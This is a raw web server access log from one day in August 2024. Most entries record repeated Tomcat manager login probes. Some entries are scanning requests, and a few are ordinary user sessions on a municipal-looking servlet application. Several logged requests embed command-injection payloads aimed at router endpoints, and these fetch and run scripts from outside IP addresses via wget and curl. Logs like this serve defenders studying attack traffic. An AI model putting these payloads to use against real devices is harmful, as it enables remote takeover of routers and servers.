46.105.97.78 - tomcat [13/Aug/2024:00:01:15 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:03:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:06:01 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:08:23 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:10:44 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:13:04 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:15:27 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:17:47 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:20:06 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:22:24 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:24:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:27:02 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:29:20 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:31:39 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:33:58 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:36:18 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:38:37 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:40:58 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:43:18 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:45:38 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:47:57 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:50:15 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:52:32 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:54:52 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:00:57:11 -0300] "GET /manager/html HTTP/1.1" 403 3196
154.213.184.18 - - [13/Aug/2024:00:57:16 -0300] "CONNECT example.com:443 HTTP/1.1" 400 -
46.105.97.78 - tomcat [13/Aug/2024:00:59:29 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:01:48 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:04:09 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:06:30 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:08:52 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:11:14 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:13:32 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:15:51 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:18:11 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:20:29 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:22:50 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:25:10 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:27:30 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:29:48 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:32:06 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:34:25 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:36:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:39:02 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:41:22 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:43:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:46:01 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:48:19 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:50:38 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:52:55 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:55:14 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:57:32 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:01:59:50 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:02:09 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:04:29 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:06:47 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:09:05 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:11:23 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:13:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:15:59 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:18:20 -0300] "GET /manager/html HTTP/1.1" 403 3196
185.224.128.83 - - [13/Aug/2024:02:18:50 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.18.103%2Ft%7Csh%3B%60) HTTP/1.1" 404 1013
46.105.97.78 - tomcat [13/Aug/2024:02:20:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:23:00 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:25:21 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:27:39 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:29:58 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:32:16 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:34:34 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:36:52 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:39:11 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:41:31 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:43:49 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:46:08 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:48:27 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:50:45 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:53:03 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:55:22 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:02:57:40 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:00:00 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:02:21 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:04:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:07:03 -0300] "GET /manager/html HTTP/1.1" 403 3196
47.91.149.158 - - [13/Aug/2024:03:07:28 -0300] "GET / HTTP/1.1" 200 11217
46.105.97.78 - tomcat [13/Aug/2024:03:09:24 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:11:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.51.21 - - [13/Aug/2024:03:13:14 -0300] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 1013
46.105.97.78 - tomcat [13/Aug/2024:03:14:03 -0300] "GET /manager/html HTTP/1.1" 403 3196
188.166.165.226 - - [13/Aug/2024:03:14:43 -0300] "GET / HTTP/1.1" 200 11217
46.105.97.78 - tomcat [13/Aug/2024:03:16:22 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:18:40 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:20:59 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:23:18 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:25:36 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:27:57 -0300] "GET /manager/html HTTP/1.1" 403 3196
154.213.185.140 - - [13/Aug/2024:03:28:03 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>+cd+%2Ftmp+wget+http%3A%2F%2F45.66.231.213%2Fr%3B+curl+-O+http%3A%2F%2F45.66.231.213%2Fr%3B+chmod+%2Bx+r%3B+.%2Fr%20tplink) HTTP/1.1" 400 -
46.105.97.78 - tomcat [13/Aug/2024:03:30:21 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:32:48 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:35:14 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:37:33 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:39:53 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:42:11 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:44:30 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:46:50 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:49:08 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:51:27 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:53:46 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:56:04 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:03:58:24 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:00:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:03:03 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:05:24 -0300] "GET /manager/html HTTP/1.1" 403 3196
154.213.184.25 - - [13/Aug/2024:04:05:38 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
46.105.97.78 - tomcat [13/Aug/2024:04:07:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:10:01 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:12:22 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:14:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:17:01 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:19:19 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:21:37 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:23:56 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:26:14 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:28:32 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:30:51 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:33:10 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:35:29 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:37:47 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:40:07 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:42:27 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:44:47 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:47:06 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:49:25 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:51:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:54:00 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:56:19 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:04:58:37 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:00:55 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:03:15 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:05:34 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:07:53 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:10:16 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:12:39 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:14:57 -0300] "GET /manager/html HTTP/1.1" 403 3196
185.224.128.83 - - [13/Aug/2024:05:15:34 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.18.103%2Ft%7Csh%3B%60) HTTP/1.1" 404 1013
46.105.97.78 - tomcat [13/Aug/2024:05:17:16 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:19:33 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:21:51 -0300] "GET /manager/html HTTP/1.1" 403 3196
206.168.34.33 - - [13/Aug/2024:05:23:38 -0300] "GET / HTTP/1.1" 200 11217
206.168.34.33 - - [13/Aug/2024:05:23:41 -0300] "GET / HTTP/1.1" 200 11217
206.168.34.33 - - [13/Aug/2024:05:23:42 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
206.168.34.33 - - [13/Aug/2024:05:23:42 -0300] "PRI * HTTP/2.0" 505 -
46.105.97.78 - tomcat [13/Aug/2024:05:24:08 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:26:26 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:28:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:31:00 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:33:19 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:35:37 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:37:54 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:40:12 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:42:29 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:44:47 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:47:04 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:49:21 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:51:38 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:53:55 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:56:40 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:05:59:27 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:01:46 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:04:06 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:06:25 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:09:49 -0300] "GET /manager/html HTTP/1.1" 403 3196
198.235.24.77 - - [13/Aug/2024:06:11:52 -0300] "GET / HTTP/1.0" 200 11197
46.105.97.78 - tomcat [13/Aug/2024:06:14:06 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:17:54 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:21:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:25:29 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:29:16 -0300] "GET /manager/html HTTP/1.1" 403 3196
59.182.141.222 - - [13/Aug/2024:06:31:10 -0300] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 997
46.105.97.78 - tomcat [13/Aug/2024:06:33:04 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:36:51 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:40:38 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:44:26 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:48:14 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:52:02 -0300] "GET /manager/html HTTP/1.1" 403 3196
154.213.184.25 - - [13/Aug/2024:06:52:56 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
46.105.97.78 - tomcat [13/Aug/2024:06:55:50 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:06:59:39 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:03:57 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:08:17 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:12:06 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:15:53 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:19:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:23:56 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:28:13 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:32:00 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:35:47 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:39:33 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:43:20 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:47:06 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:50:54 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:07:54:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.152.138 - - [13/Aug/2024:07:56:43 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 6033
190.171.152.138 - - [13/Aug/2024:07:57:09 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 6033
190.171.152.138 - - [13/Aug/2024:07:57:17 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1737
46.105.97.78 - tomcat [13/Aug/2024:07:58:29 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:08:02:18 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:08:06:06 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:08:09:54 -0300] "GET /manager/html HTTP/1.1" 403 3196
35.233.45.15 - - [13/Aug/2024:08:13:40 -0300] "GET / HTTP/1.1" 200 11217
46.105.97.78 - tomcat [13/Aug/2024:08:13:42 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:08:17:58 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:08:22:16 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.152.138 - - [13/Aug/2024:08:22:49 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1719
190.171.152.138 - - [13/Aug/2024:08:23:06 -0300] "POST /cormun/servlet/hlogin?e6c8a66a0bbd1cca37dd2e041b4b42ce,gx-no-cache=1723548123047 HTTP/1.1" 200 90
190.171.152.138 - - [13/Aug/2024:08:23:06 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
190.171.152.138 - - [13/Aug/2024:08:23:08 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10138
190.171.152.138 - - [13/Aug/2024:08:23:20 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 11361
190.171.152.138 - - [13/Aug/2024:08:23:20 -0300] "GET /cormun/static/gxcfg.js?202211298463625 HTTP/1.1" 200 953
190.171.152.138 - - [13/Aug/2024:08:23:20 -0300] "GET /cormun/static/trlicencias.js?202211298463889 HTTP/1.1" 200 41883
190.171.152.138 - - [13/Aug/2024:08:23:46 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1737
46.105.97.78 - tomcat [13/Aug/2024:08:26:04 -0300] "GET /manager/html HTTP/1.1" 403 3196
185.224.128.83 - - [13/Aug/2024:08:27:16 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.18.103%2Ft%7Csh%3B%60) HTTP/1.1" 404 1013
46.105.97.78 - tomcat [13/Aug/2024:08:29:52 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:08:33:40 -0300] "GET /manager/html HTTP/1.1" 403 3196
181.212.40.185 - - [13/Aug/2024:08:35:52 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 6042
181.212.40.185 - - [13/Aug/2024:08:35:53 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 6039
181.212.40.185 - - [13/Aug/2024:08:35:53 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1726
46.105.97.78 - tomcat [13/Aug/2024:08:37:55 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:08:42:14 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:08:46:02 -0300] "GET /manager/html HTTP/1.1" 403 3196
154.213.184.18 - - [13/Aug/2024:08:47:28 -0300] "CONNECT example.com:443 HTTP/1.1" 400 -
46.105.97.78 - tomcat [13/Aug/2024:08:49:48 -0300] "GET /manager/html HTTP/1.1" 403 3196
181.212.40.185 - - [13/Aug/2024:08:53:35 -0300] "POST /cormun/servlet/hlogin?b0badc24e65229de1a197669fd166fa7,gx-no-cache=1723549952099 HTTP/1.1" 200 90
46.105.97.78 - tomcat [13/Aug/2024:08:53:35 -0300] "GET /manager/html HTTP/1.1" 403 3196
181.212.40.185 - - [13/Aug/2024:08:53:36 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 948
181.212.40.185 - - [13/Aug/2024:08:53:36 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 18896
46.105.97.78 - tomcat [13/Aug/2024:08:57:23 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.152.114 - - [13/Aug/2024:09:00:36 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1726
190.171.152.114 - - [13/Aug/2024:09:00:49 -0300] "POST /cormun/servlet/hlogin?38419b3762d212d334987ecf5ec894ab,gx-no-cache=1723550384893 HTTP/1.1" 200 90
190.171.152.114 - - [13/Aug/2024:09:00:49 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
190.171.152.114 - - [13/Aug/2024:09:00:49 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4334
190.171.152.114 - - [13/Aug/2024:09:00:54 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 16647
190.171.152.114 - - [13/Aug/2024:09:01:03 -0300] "GET /cormun/servlet/alicenciaprn?18446499,L,20240812000000,PU HTTP/1.1" 200 1560
46.105.97.78 - tomcat [13/Aug/2024:09:01:11 -0300] "GET /manager/html HTTP/1.1" 403 3196
200.54.103.162 - - [13/Aug/2024:09:03:03 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3321
200.54.103.162 - - [13/Aug/2024:09:03:03 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1730
200.54.103.162 - - [13/Aug/2024:09:03:04 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
200.54.103.162 - - [13/Aug/2024:09:03:06 -0300] "POST /cormun/servlet/hlogin?b5081c9e78ac300b7026b3c8d7b9ecb5,gx-no-cache=1723550521788 HTTP/1.1" 200 90
200.54.103.162 - - [13/Aug/2024:09:03:06 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
200.54.103.162 - - [13/Aug/2024:09:03:06 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4341
200.54.103.162 - - [13/Aug/2024:09:03:08 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 14570
46.105.97.78 - tomcat [13/Aug/2024:09:05:00 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.142.42 - - [13/Aug/2024:09:05:01 -0300] "POST /cormun/servlet/hlogin?089dcee151538b0191f1f16b52ce6362,gx-no-cache=1723550634747 HTTP/1.1" 440 972
190.171.142.42 - - [13/Aug/2024:09:05:03 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1737
190.171.142.42 - - [13/Aug/2024:09:05:03 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
